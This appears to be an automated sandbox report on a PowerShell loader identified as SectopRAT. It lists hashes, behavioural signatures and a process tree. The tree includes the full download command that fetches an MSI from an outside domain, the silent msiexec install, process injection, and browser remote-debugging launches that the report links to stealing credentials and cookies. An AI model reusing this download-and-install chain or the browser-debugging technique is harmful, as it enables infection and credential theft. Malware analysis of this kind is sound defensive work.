Analysis
-
max time kernel
129s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
02/04/2025, 22:28
Static task
static1
General
-
Target
code.ps1
-
Size
128B
-
MD5
d8fb7b85741db93be10e3ed1363e32e7
-
SHA1
2b464dce118e15d86c14a3e967acea2ac333f9c3
-
SHA256
673e0d68fb4bf7faa06edab316d1fbc9cad8b10237cde5f3020b7feb45383048
-
SHA512
9023651ed98a14a2b5c579f4a61270daa337548c93169963d65cf2d9d10f1e2560e8b32874fca357acabacd8554394f369c106b95cda4c3add539870da9638af
Malware Config
Signatures
-
SectopRAT payload 1 IoCs
resource yara_rule behavioral1/memory/5980-1449-0x0000000000400000-0x00000000004D4000-memory.dmp family_sectoprat -
Sectoprat family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3208 created 3468 3208 CasPol.exe 56 -
Blocklisted process makes network request 2 IoCs
flow pid Process 9 644 powershell.exe 17 644 powershell.exe -
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1680 msedge.exe 644 chrome.exe 408 chrome.exe 4992 chrome.exe 5376 chrome.exe 3536 msedge.exe 1416 chrome.exe 3876 chrome.exe 4372 msedge.exe 1972 msedge.exe -
Executes dropped EXE 2 IoCs
pid Process 2676 vmnetdhcp.exe 5980 CasPol.exe -
Loads dropped DLL 5 IoCs
pid Process 4544 MsiExec.exe 4544 MsiExec.exe 4544 MsiExec.exe 4544 MsiExec.exe 3208 CasPol.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2676 set thread context of 3208 2676 vmnetdhcp.exe 105 PID 2676 set thread context of 744 2676 vmnetdhcp.exe 107 PID 3208 set thread context of 5980 3208 CasPol.exe 111 -
Drops file in Windows directory 12 IoCs
description ioc Process File created C:\Windows\Installer\SourceHash{05E46191-7BCB-4049-A621-B435063F3BBD} msiexec.exe File opened for modification C:\Windows\Installer\MSIBDB6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBAE4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBC2D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBCDB.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\e57b971.msi msiexec.exe File created C:\Windows\Installer\e57b96d.msi msiexec.exe File opened for modification C:\Windows\Installer\e57b96d.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIBC8B.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
pid Process 3048 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vmnetdhcp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3048 powershell.exe 3048 powershell.exe 644 powershell.exe 644 powershell.exe 4952 msiexec.exe 4952 msiexec.exe 2676 vmnetdhcp.exe 2676 vmnetdhcp.exe 2676 vmnetdhcp.exe 2676 vmnetdhcp.exe 2676 vmnetdhcp.exe 2676 vmnetdhcp.exe 3208 CasPol.exe 3208 CasPol.exe 3208 CasPol.exe 3208 CasPol.exe 744 gpupdate.exe 744 gpupdate.exe 744 gpupdate.exe 3208 CasPol.exe 3208 CasPol.exe 5980 CasPol.exe 5980 CasPol.exe 5980 CasPol.exe 5980 CasPol.exe 5980 CasPol.exe 5980 CasPol.exe 5980 CasPol.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 5980 CasPol.exe 5980 CasPol.exe 5980 CasPol.exe 5980 CasPol.exe 5980 CasPol.exe 668 taskmgr.exe 668 taskmgr.exe 644 chrome.exe 644 chrome.exe 668 taskmgr.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2676 vmnetdhcp.exe 2676 vmnetdhcp.exe 2676 vmnetdhcp.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 3536 msedge.exe 3536 msedge.exe 3536 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3048 powershell.exe Token: SeDebugPrivilege 644 powershell.exe Token: SeShutdownPrivilege 1452 msiexec.exe Token: SeIncreaseQuotaPrivilege 1452 msiexec.exe Token: SeSecurityPrivilege 4952 msiexec.exe Token: SeCreateTokenPrivilege 1452 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1452 msiexec.exe Token: SeLockMemoryPrivilege 1452 msiexec.exe Token: SeIncreaseQuotaPrivilege 1452 msiexec.exe Token: SeMachineAccountPrivilege 1452 msiexec.exe Token: SeTcbPrivilege 1452 msiexec.exe Token: SeSecurityPrivilege 1452 msiexec.exe Token: SeTakeOwnershipPrivilege 1452 msiexec.exe Token: SeLoadDriverPrivilege 1452 msiexec.exe Token: SeSystemProfilePrivilege 1452 msiexec.exe Token: SeSystemtimePrivilege 1452 msiexec.exe Token: SeProfSingleProcessPrivilege 1452 msiexec.exe Token: SeIncBasePriorityPrivilege 1452 msiexec.exe Token: SeCreatePagefilePrivilege 1452 msiexec.exe Token: SeCreatePermanentPrivilege 1452 msiexec.exe Token: SeBackupPrivilege 1452 msiexec.exe Token: SeRestorePrivilege 1452 msiexec.exe Token: SeShutdownPrivilege 1452 msiexec.exe Token: SeDebugPrivilege 1452 msiexec.exe Token: SeAuditPrivilege 1452 msiexec.exe Token: SeSystemEnvironmentPrivilege 1452 msiexec.exe Token: SeChangeNotifyPrivilege 1452 msiexec.exe Token: SeRemoteShutdownPrivilege 1452 msiexec.exe Token: SeUndockPrivilege 1452 msiexec.exe Token: SeSyncAgentPrivilege 1452 msiexec.exe Token: SeEnableDelegationPrivilege 1452 msiexec.exe Token: SeManageVolumePrivilege 1452 msiexec.exe Token: SeImpersonatePrivilege 1452 msiexec.exe Token: SeCreateGlobalPrivilege 1452 msiexec.exe Token: SeRestorePrivilege 4952 msiexec.exe Token: SeTakeOwnershipPrivilege 4952 msiexec.exe Token: SeRestorePrivilege 4952 msiexec.exe Token: SeTakeOwnershipPrivilege 4952 msiexec.exe Token: SeRestorePrivilege 4952 msiexec.exe Token: SeTakeOwnershipPrivilege 4952 msiexec.exe Token: SeRestorePrivilege 4952 msiexec.exe Token: SeTakeOwnershipPrivilege 4952 msiexec.exe Token: SeRestorePrivilege 4952 msiexec.exe Token: SeTakeOwnershipPrivilege 4952 msiexec.exe Token: SeRestorePrivilege 4952 msiexec.exe Token: SeTakeOwnershipPrivilege 4952 msiexec.exe Token: SeRestorePrivilege 4952 msiexec.exe Token: SeTakeOwnershipPrivilege 4952 msiexec.exe Token: SeRestorePrivilege 4952 msiexec.exe Token: SeTakeOwnershipPrivilege 4952 msiexec.exe Token: SeRestorePrivilege 4952 msiexec.exe Token: SeTakeOwnershipPrivilege 4952 msiexec.exe Token: SeRestorePrivilege 4952 msiexec.exe Token: SeTakeOwnershipPrivilege 4952 msiexec.exe Token: SeRestorePrivilege 4952 msiexec.exe Token: SeTakeOwnershipPrivilege 4952 msiexec.exe Token: SeRestorePrivilege 4952 msiexec.exe Token: SeTakeOwnershipPrivilege 4952 msiexec.exe Token: SeRestorePrivilege 4952 msiexec.exe Token: SeTakeOwnershipPrivilege 4952 msiexec.exe Token: SeRestorePrivilege 4952 msiexec.exe Token: SeTakeOwnershipPrivilege 4952 msiexec.exe Token: SeRestorePrivilege 4952 msiexec.exe Token: SeTakeOwnershipPrivilege 4952 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 668 taskmgr.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe 644 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe 668 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5980 CasPol.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3048 wrote to memory of 644 3048 powershell.exe 86 PID 3048 wrote to memory of 644 3048 powershell.exe 86 PID 3048 wrote to memory of 1452 3048 powershell.exe 99 PID 3048 wrote to memory of 1452 3048 powershell.exe 99 PID 4952 wrote to memory of 4544 4952 msiexec.exe 102 PID 4952 wrote to memory of 4544 4952 msiexec.exe 102 PID 4952 wrote to memory of 4544 4952 msiexec.exe 102 PID 4952 wrote to memory of 2676 4952 msiexec.exe 103 PID 4952 wrote to memory of 2676 4952 msiexec.exe 103 PID 4952 wrote to memory of 2676 4952 msiexec.exe 103 PID 2676 wrote to memory of 3208 2676 vmnetdhcp.exe 105 PID 2676 wrote to memory of 3208 2676 vmnetdhcp.exe 105 PID 2676 wrote to memory of 3208 2676 vmnetdhcp.exe 105 PID 2676 wrote to memory of 3208 2676 vmnetdhcp.exe 105 PID 2676 wrote to memory of 3208 2676 vmnetdhcp.exe 105 PID 2676 wrote to memory of 744 2676 vmnetdhcp.exe 107 PID 2676 wrote to memory of 744 2676 vmnetdhcp.exe 107 PID 2676 wrote to memory of 744 2676 vmnetdhcp.exe 107 PID 2676 wrote to memory of 744 2676 vmnetdhcp.exe 107 PID 3208 wrote to memory of 5980 3208 CasPol.exe 111 PID 3208 wrote to memory of 5980 3208 CasPol.exe 111 PID 3208 wrote to memory of 5980 3208 CasPol.exe 111 PID 3208 wrote to memory of 5980 3208 CasPol.exe 111 PID 3208 wrote to memory of 5980 3208 CasPol.exe 111 PID 3208 wrote to memory of 5980 3208 CasPol.exe 111 PID 3208 wrote to memory of 5980 3208 CasPol.exe 111 PID 3208 wrote to memory of 5980 3208 CasPol.exe 111 PID 5980 wrote to memory of 644 5980 CasPol.exe 128 PID 5980 wrote to memory of 644 5980 CasPol.exe 128 PID 644 wrote to memory of 556 644 chrome.exe 129 PID 644 wrote to memory of 556 644 chrome.exe 129 PID 644 wrote to memory of 4544 644 chrome.exe 130 PID 644 wrote to memory of 4544 644 chrome.exe 130 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 6124 644 chrome.exe 131 PID 644 wrote to memory of 4728 644 chrome.exe 132
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\code.ps12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:644
-
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe" /i C:\Users\Public\7bc.msi /qn3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
-
C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe"C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5980 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9878 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffca1e5dcf8,0x7ffca1e5dd04,0x7ffca1e5dd104⤵PID:556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2076,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2116 /prefetch:34⤵PID:4544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2064,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2056 /prefetch:24⤵PID:6124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2432,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2380 /prefetch:84⤵PID:4728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9878 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3288,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3300 /prefetch:14⤵
- Uses browser remote debugging
PID:3876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9878 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3324,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3336 /prefetch:14⤵
- Uses browser remote debugging
PID:1416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9878 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4476,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4524 /prefetch:24⤵
- Uses browser remote debugging
PID:4992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9878 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3896,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4504 /prefetch:24⤵
- Uses browser remote debugging
PID:408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9878 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4304,i,1546158812589135468,1997010632693051780,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4924 /prefetch:14⤵
- Uses browser remote debugging
PID:5376
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=8417 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3536 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x268,0x7ffca1cdf208,0x7ffca1cdf214,0x7ffca1cdf2204⤵PID:3696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1912,i,5020803063420202390,3163134547666833790,262144 --variations-seed-version --mojo-platform-channel-handle=2720 /prefetch:34⤵PID:5392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2688,i,5020803063420202390,3163134547666833790,262144 --variations-seed-version --mojo-platform-channel-handle=2684 /prefetch:24⤵PID:3532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2008,i,5020803063420202390,3163134547666833790,262144 --variations-seed-version --mojo-platform-channel-handle=2900 /prefetch:84⤵PID:3064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=8417 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3580,i,5020803063420202390,3163134547666833790,262144 --variations-seed-version --mojo-platform-channel-handle=3648 /prefetch:14⤵
- Uses browser remote debugging
PID:1972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=8417 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3588,i,5020803063420202390,3163134547666833790,262144 --variations-seed-version --mojo-platform-channel-handle=3660 /prefetch:14⤵
- Uses browser remote debugging
PID:4372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --pdf-upsell-enabled --remote-debugging-port=8417 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4896,i,5020803063420202390,3163134547666833790,262144 --variations-seed-version --mojo-platform-channel-handle=4912 /prefetch:24⤵
- Uses browser remote debugging
PID:1680
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /72⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:668
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5D58F7367683250F38A619F767BB182E2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4544
-
-
C:\Users\Admin\AppData\Roaming\Cruse\vmnetdhcp.exe"C:\Users\Admin\AppData\Roaming\Cruse\vmnetdhcp.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
